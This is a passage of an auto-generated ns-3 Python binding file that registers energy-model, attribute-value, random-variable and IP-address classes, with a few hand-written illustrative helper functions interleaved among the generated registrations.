## device-energy-model.h (module 'energy'): ns3::DeviceEnergyModel::DeviceEnergyModel(ns3::DeviceEnergyModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DeviceEnergyModel const &', 'arg0')])
## device-energy-model.h (module 'energy'): ns3::DeviceEnergyModel::DeviceEnergyModel() [constructor]
cls.add_constructor([])
## device-energy-model.h (module 'energy'): void ns3::DeviceEnergyModel::ChangeState(int newState) [member function]
cls.add_method('ChangeState',
'void',
[param('int', 'newState')],
is_pure_virtual=True, is_virtual=True)
## device-energy-model.h (module 'energy'): double ns3::DeviceEnergyModel::GetCurrentA() const [member function]
cls.add_method('GetCurrentA',
'double',
[],
is_const=True)
## device-energy-model.h (module 'energy'): double ns3::DeviceEnergyModel::GetTotalEnergyConsumption() const [member function]
cls.add_method('GetTotalEnergyConsumption',
'double',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## device-energy-model.h (module 'energy'): static ns3::TypeId ns3::DeviceEnergyModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## device-energy-model.h (module 'energy'): void ns3::DeviceEnergyModel::HandleEnergyDepletion() [member function]
cls.add_method('HandleEnergyDepletion',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## device-energy-model.h (module 'energy'): void ns3::DeviceEnergyModel::SetEnergySource(ns3::Ptr<ns3::EnergySource> source) [member function]
cls.add_method('SetEnergySource',
'void',
[param('ns3::Ptr< ns3::EnergySource >', 'source')],
is_pure_virtual=True, is_virtual=True)
## device-energy-model.h (module 'energy'): double ns3::DeviceEnergyModel::DoGetCurrentA() const [member function]
cls.add_method('DoGetCurrentA',
'double',
[],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3DoubleValue_methods(root_module, cls):
## double.h (module 'core'): ns3::DoubleValue::DoubleValue() [constructor]
cls.add_constructor([])
## double.h (module 'core'): ns3::DoubleValue::DoubleValue(ns3::DoubleValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DoubleValue const &', 'arg0')])
## double.h (module 'core'): ns3::DoubleValue::DoubleValue(double const & value) [constructor]
cls.add_constructor([param('double const &', 'value')])
## double.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::DoubleValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## double.h (module 'core'): bool ns3::DoubleValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## double.h (module 'core'): double ns3::DoubleValue::Get() const [member function]
cls.add_method('Get',
'double',
[],
is_const=True)
## double.h (module 'core'): std::string ns3::DoubleValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## double.h (module 'core'): void ns3::DoubleValue::Set(double const & value) [member function]
cls.add_method('Set',
'void',
[param('double const &', 'value')])
return
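# Illustrative sketch (not generator output): DoubleValue is the carrier type for
# numeric attributes and is usually constructed inline. Config.SetDefault and the
# "SpreadCoef" attribute of UanPropModelThorp are assumptions drawn from the wider
# ns-3 API and are not registered in this excerpt.
def _example_double_value_default():
    import ns.core
    ns.core.Config.SetDefault("ns3::UanPropModelThorp::SpreadCoef",
                              ns.core.DoubleValue(1.5))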
def register_Ns3EmpiricalRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable::EmpiricalRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::CDF(double v, double c) [member function]
cls.add_method('CDF',
'void',
[param('double', 'v'), param('double', 'c')])
## random-variable-stream.h (module 'core'): uint32_t ns3::EmpiricalRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::EmpiricalRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::Interpolate(double arg0, double arg1, double arg2, double arg3, double arg4) [member function]
cls.add_method('Interpolate',
'double',
[param('double', 'arg0'), param('double', 'arg1'), param('double', 'arg2'), param('double', 'arg3'), param('double', 'arg4')],
visibility='private', is_virtual=True)
## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::Validate() [member function]
cls.add_method('Validate',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EnergySource_methods(root_module, cls):
## energy-source.h (module 'energy'): ns3::EnergySource::EnergySource(ns3::EnergySource const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EnergySource const &', 'arg0')])
## energy-source.h (module 'energy'): ns3::EnergySource::EnergySource() [constructor]
cls.add_constructor([])
## energy-source.h (module 'energy'): void ns3::EnergySource::AppendDeviceEnergyModel(ns3::Ptr<ns3::DeviceEnergyModel> deviceEnergyModelPtr) [member function]
cls.add_method('AppendDeviceEnergyModel',
'void',
[param('ns3::Ptr< ns3::DeviceEnergyModel >', 'deviceEnergyModelPtr')])
## energy-source.h (module 'energy'): void ns3::EnergySource::DisposeDeviceModels() [member function]
cls.add_method('DisposeDeviceModels',
'void',
[])
## energy-source.h (module 'energy'): ns3::DeviceEnergyModelContainer ns3::EnergySource::FindDeviceEnergyModels(ns3::TypeId tid) [member function]
cls.add_method('FindDeviceEnergyModels',
'ns3::DeviceEnergyModelContainer',
[param('ns3::TypeId', 'tid')])
## energy-source.h (module 'energy'): ns3::DeviceEnergyModelContainer ns3::EnergySource::FindDeviceEnergyModels(std::string name) [member function]
cls.add_method('FindDeviceEnergyModels',
'ns3::DeviceEnergyModelContainer',
[param('std::string', 'name')])
## energy-source.h (module 'energy'): double ns3::EnergySource::GetEnergyFraction() [member function]
cls.add_method('GetEnergyFraction',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## energy-source.h (module 'energy'): double ns3::EnergySource::GetInitialEnergy() const [member function]
cls.add_method('GetInitialEnergy',
'double',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## energy-source.h (module 'energy'): ns3::Ptr<ns3::Node> ns3::EnergySource::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True)
## energy-source.h (module 'energy'): double ns3::EnergySource::GetRemainingEnergy() [member function]
cls.add_method('GetRemainingEnergy',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## energy-source.h (module 'energy'): double ns3::EnergySource::GetSupplyVoltage() const [member function]
cls.add_method('GetSupplyVoltage',
'double',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## energy-source.h (module 'energy'): static ns3::TypeId ns3::EnergySource::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## energy-source.h (module 'energy'): void ns3::EnergySource::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## energy-source.h (module 'energy'): void ns3::EnergySource::StartDeviceModels() [member function]
cls.add_method('StartDeviceModels',
'void',
[])
## energy-source.h (module 'energy'): void ns3::EnergySource::UpdateEnergySource() [member function]
cls.add_method('UpdateEnergySource',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## energy-source.h (module 'energy'): void ns3::EnergySource::BreakDeviceEnergyModelRefCycle() [member function]
cls.add_method('BreakDeviceEnergyModelRefCycle',
'void',
[],
visibility='protected')
## energy-source.h (module 'energy'): double ns3::EnergySource::CalculateTotalCurrent() [member function]
cls.add_method('CalculateTotalCurrent',
'double',
[],
visibility='protected')
## energy-source.h (module 'energy'): void ns3::EnergySource::NotifyEnergyDrained() [member function]
cls.add_method('NotifyEnergyDrained',
'void',
[],
visibility='protected')
## energy-source.h (module 'energy'): void ns3::EnergySource::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='private', is_virtual=True)
return
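# Illustrative sketch (not generator output): EnergySource is the battery-side
# abstract interface; DeviceEnergyModel instances attach to it and the protected
# helpers (CalculateTotalCurrent, NotifyEnergyDrained) are used internally by
# concrete sources. Wiring, assuming a concrete source such as BasicEnergySource
# (registered outside this excerpt) and a concrete device energy model:
def _example_wire_energy_model(source, device_model):
    device_model.SetEnergySource(source)       # pure virtual on DeviceEnergyModel
    source.AppendDeviceEnergyModel(device_model)
    source.UpdateEnergySource()                 # recompute remaining energy from current draw
    return source.GetRemainingEnergy(), source.GetEnergyFraction()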
def register_Ns3EnergySourceContainer_methods(root_module, cls):
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer::EnergySourceContainer(ns3::EnergySourceContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EnergySourceContainer const &', 'arg0')])
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer::EnergySourceContainer() [constructor]
cls.add_constructor([])
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer::EnergySourceContainer(ns3::Ptr<ns3::EnergySource> source) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::EnergySource >', 'source')])
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer::EnergySourceContainer(std::string sourceName) [constructor]
cls.add_constructor([param('std::string', 'sourceName')])
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer::EnergySourceContainer(ns3::EnergySourceContainer const & a, ns3::EnergySourceContainer const & b) [constructor]
cls.add_constructor([param('ns3::EnergySourceContainer const &', 'a'), param('ns3::EnergySourceContainer const &', 'b')])
## energy-source-container.h (module 'energy'): void ns3::EnergySourceContainer::Add(ns3::EnergySourceContainer container) [member function]
cls.add_method('Add',
'void',
[param('ns3::EnergySourceContainer', 'container')])
## energy-source-container.h (module 'energy'): void ns3::EnergySourceContainer::Add(ns3::Ptr<ns3::EnergySource> source) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::EnergySource >', 'source')])
## energy-source-container.h (module 'energy'): void ns3::EnergySourceContainer::Add(std::string sourceName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'sourceName')])
## energy-source-container.h (module 'energy'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::EnergySource>*,std::vector<ns3::Ptr<ns3::EnergySource>, std::allocator<ns3::Ptr<ns3::EnergySource> > > > ns3::EnergySourceContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::EnergySource > const, std::vector< ns3::Ptr< ns3::EnergySource > > >',
[],
is_const=True)
## energy-source-container.h (module 'energy'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::EnergySource>*,std::vector<ns3::Ptr<ns3::EnergySource>, std::allocator<ns3::Ptr<ns3::EnergySource> > > > ns3::EnergySourceContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::EnergySource > const, std::vector< ns3::Ptr< ns3::EnergySource > > >',
[],
is_const=True)
## energy-source-container.h (module 'energy'): ns3::Ptr<ns3::EnergySource> ns3::EnergySourceContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::EnergySource >',
[param('uint32_t', 'i')],
is_const=True)
## energy-source-container.h (module 'energy'): uint32_t ns3::EnergySourceContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
## energy-source-container.h (module 'energy'): static ns3::TypeId ns3::EnergySourceContainer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## energy-source-container.h (module 'energy'): void ns3::EnergySourceContainer::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='private', is_virtual=True)
## energy-source-container.h (module 'energy'): void ns3::EnergySourceContainer::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='private', is_virtual=True)
return
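# Illustrative sketch (not generator output): EnergySourceContainer follows the
# usual ns-3 container idiom (Add/Get/GetN, Begin/End). The 'ns.energy' module
# path is an assumption; the helper is never invoked by the generator.
def _example_energy_source_container(src_a, src_b):
    import ns.energy
    container = ns.energy.EnergySourceContainer(src_a)   # single-source constructor
    container.Add(src_b)
    # Indexed access through the methods registered above:
    return [container.Get(i).GetInitialEnergy() for i in range(container.GetN())]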
def register_Ns3EnumChecker_methods(root_module, cls):
## enum.h (module 'core'): ns3::EnumChecker::EnumChecker(ns3::EnumChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EnumChecker const &', 'arg0')])
## enum.h (module 'core'): ns3::EnumChecker::EnumChecker() [constructor]
cls.add_constructor([])
## enum.h (module 'core'): void ns3::EnumChecker::Add(int v, std::string name) [member function]
cls.add_method('Add',
'void',
[param('int', 'v'), param('std::string', 'name')])
## enum.h (module 'core'): void ns3::EnumChecker::AddDefault(int v, std::string name) [member function]
cls.add_method('AddDefault',
'void',
[param('int', 'v'), param('std::string', 'name')])
## enum.h (module 'core'): bool ns3::EnumChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_const=True, is_virtual=True)
## enum.h (module 'core'): bool ns3::EnumChecker::Copy(ns3::AttributeValue const & src, ns3::AttributeValue & dst) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'src'), param('ns3::AttributeValue &', 'dst')],
is_const=True, is_virtual=True)
## enum.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EnumChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## enum.h (module 'core'): std::string ns3::EnumChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_const=True, is_virtual=True)
## enum.h (module 'core'): std::string ns3::EnumChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_const=True, is_virtual=True)
## enum.h (module 'core'): bool ns3::EnumChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_const=True, is_virtual=True)
return
def register_Ns3EnumValue_methods(root_module, cls):
## enum.h (module 'core'): ns3::EnumValue::EnumValue(ns3::EnumValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EnumValue const &', 'arg0')])
## enum.h (module 'core'): ns3::EnumValue::EnumValue() [constructor]
cls.add_constructor([])
## enum.h (module 'core'): ns3::EnumValue::EnumValue(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## enum.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EnumValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## enum.h (module 'core'): bool ns3::EnumValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## enum.h (module 'core'): int ns3::EnumValue::Get() const [member function]
cls.add_method('Get',
'int',
[],
is_const=True)
## enum.h (module 'core'): std::string ns3::EnumValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## enum.h (module 'core'): void ns3::EnumValue::Set(int v) [member function]
cls.add_method('Set',
'void',
[param('int', 'v')])
return
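# Illustrative sketch (not generator output): EnumChecker holds the int <-> name
# table used when (de)serializing an EnumValue; Add/AddDefault populate it. The
# enumerator names below are purely hypothetical.
def _example_enum_checker_and_value():
    import ns.core
    checker = ns.core.EnumChecker()
    checker.AddDefault(0, "SLEEP")    # hypothetical enumerators
    checker.Add(1, "IDLE")
    checker.Add(2, "TX")
    v = ns.core.EnumValue(2)
    return v.Get(), checker.Check(v)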
def register_Ns3ErlangRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ErlangRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable::ErlangRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetK() const [member function]
cls.add_method('GetK',
'uint32_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetLambda() const [member function]
cls.add_method('GetLambda',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue(uint32_t k, double lambda) [member function]
cls.add_method('GetValue',
'double',
[param('uint32_t', 'k'), param('double', 'lambda')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger(uint32_t k, uint32_t lambda) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'k'), param('uint32_t', 'lambda')])
## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3EventImpl_methods(root_module, cls):
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl(ns3::EventImpl const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventImpl const &', 'arg0')])
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl() [constructor]
cls.add_constructor([])
## event-impl.h (module 'core'): void ns3::EventImpl::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Invoke() [member function]
cls.add_method('Invoke',
'void',
[])
## event-impl.h (module 'core'): bool ns3::EventImpl::IsCancelled() [member function]
cls.add_method('IsCancelled',
'bool',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Notify() [member function]
cls.add_method('Notify',
'void',
[],
is_pure_virtual=True, visibility='protected', is_virtual=True)
return
def register_Ns3ExponentialRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ExponentialRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable::ExponentialRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue(double mean, double bound) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'bound')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger(uint32_t mean, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3GammaRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::GammaRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable::GammaRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetAlpha() const [member function]
cls.add_method('GetAlpha',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetBeta() const [member function]
cls.add_method('GetBeta',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue(double alpha, double beta) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'alpha'), param('double', 'beta')])
## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger(uint32_t alpha, uint32_t beta) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'alpha'), param('uint32_t', 'beta')])
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3IntegerValue_methods(root_module, cls):
## integer.h (module 'core'): ns3::IntegerValue::IntegerValue() [constructor]
cls.add_constructor([])
## integer.h (module 'core'): ns3::IntegerValue::IntegerValue(ns3::IntegerValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntegerValue const &', 'arg0')])
## integer.h (module 'core'): ns3::IntegerValue::IntegerValue(int64_t const & value) [constructor]
cls.add_constructor([param('int64_t const &', 'value')])
## integer.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::IntegerValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## integer.h (module 'core'): bool ns3::IntegerValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## integer.h (module 'core'): int64_t ns3::IntegerValue::Get() const [member function]
cls.add_method('Get',
'int64_t',
[],
is_const=True)
## integer.h (module 'core'): std::string ns3::IntegerValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## integer.h (module 'core'): void ns3::IntegerValue::Set(int64_t const & value) [member function]
cls.add_method('Set',
'void',
[param('int64_t const &', 'value')])
return
def register_Ns3Ipv4AddressChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv4AddressValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Address const &', 'value')])
return
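# Illustrative sketch (not generator output): the address checker/value pairs
# mirror the core attribute types; Ipv4AddressValue simply wraps an
# ns3::Ipv4Address. The Ipv4Address string constructor is assumed to be bound
# elsewhere in the 'network' module.
def _example_ipv4_address_value():
    import ns.network
    v = ns.network.Ipv4AddressValue(ns.network.Ipv4Address("10.1.1.1"))
    v.Set(ns.network.Ipv4Address("10.1.1.2"))
    return v.Get()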
def register_Ns3Ipv4MaskChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker(ns3::Ipv4MaskChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')])
return
def register_Ns3Ipv4MaskValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4MaskValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4Mask const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4MaskValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4MaskValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Mask ns3::Ipv4MaskValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Mask',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4MaskValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4MaskValue::Set(ns3::Ipv4Mask const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Mask const &', 'value')])
return
def register_Ns3Ipv6AddressChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker(ns3::Ipv6AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv6AddressValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
